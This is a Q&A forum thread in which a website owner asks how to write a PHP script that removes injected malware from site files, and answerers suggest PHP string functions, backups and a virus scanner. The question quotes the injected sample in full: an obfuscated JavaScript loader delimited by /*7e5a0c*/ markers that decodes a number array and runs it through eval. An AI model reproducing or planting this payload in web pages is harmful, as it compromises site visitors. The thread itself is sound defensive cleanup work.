# How do i write a php script to clean this code out?

Tags: php, virus

One of my sites has been hit with malware.  The code that they added to my js files looks like this:

```
/*7e5a0c*/
v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,117,102,95,104,115,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,116,101,97,103,114,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,111,105,110,97,119,106,97,108,44,114,116,45,99,110,115,110,115,47,51,45,110,104,111,37,59,12,8,32,31,30,32,116,101,97,103,114,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,30,32,31,115,103,96,102,116,45,113,116,120,106,101,45,96,111,113,98,101,113,30,61,31,37,48,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,104,100,103,103,103,114,32,60,30,39,48,110,120,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,115,103,96,102,116,45,113,116,120,106,101,45,106,101,101,114,32,60,30,39,48,110,120,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,116,110,110,32,60,30,39,48,110,120,38,57,13,9,11,10,31,30,32,31,103,102,31,38,33,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,115,103,96,102,116,38,39,41,31,121,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,117,102,95,104,115,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,116,101,97,103,114,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,117,102,95,104,115,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)
/*/7e5a0c*/
```

The code that they added to my php and html files is slightly different, how can I write a php script to step through all of my site files and remove any text between 2 tags, for examnple in the code above, I would have it remove everything between and including /*7e5a0c*/ and /*7e5a0c*/

Comment: What about restoring from backups? If not, using sed or awk (if on Linux) would be far better than using php.

Comment: don't you have backup for your code, that will be the best method

Comment: Ultra Edit allows you to search and replace within files on a directory structure.  the free trial should be sufficient to do what u need.  I had to do somethign very similar about a year ago and used ultra edit.  http://www.ultraedit.com

Answer (score 1, accepted):

I think you can make it width these two functions :
file_get_contents : http://php.net/manual/fr/function.file-get-contents.php
explode : http://php.net/manual/fr/function.explode.php

Something like :

```
$c = file_get_contents('yourfile.php');
$a= explode('/*7e5a0c*/', $c);
```

your code without the "virus" :

```
$r = $a[0].$a[2]
```

Not sure if it removes the "/*7e5a0c*/" , if so try :

```
str_replace("/*7e5a0c*/", "", $r);
```

edit : text editor (notepad++) search function can also helps you.

Comment: didn't notice there were both `/*/7e5a0c*/` and `/*7e5a0c*/` before running my code be sure to convert all the `/*/7e5a0c*/` to `/*7e5a0c*/` (using str_replace)

Answer (score 0):

```
function removeTag($text, $tagStart, $tagEnd) {
    while (($posStart = strpos($text, $tagStart)) !== false) {
        $posEnd = strpos($text, $tagEnd, $posStart + strlen($tagStart));
        if ($posEnd === false) return $text;
        $text = substr($text, 0, $posStart) . substr($text, $posEnd + strlen($tagEnd));
    }
    return $text;
}
```

But I would rather recommend to scan your files with a command line virus scanner like [clamAV](http://www.clamav.net/lang/en/)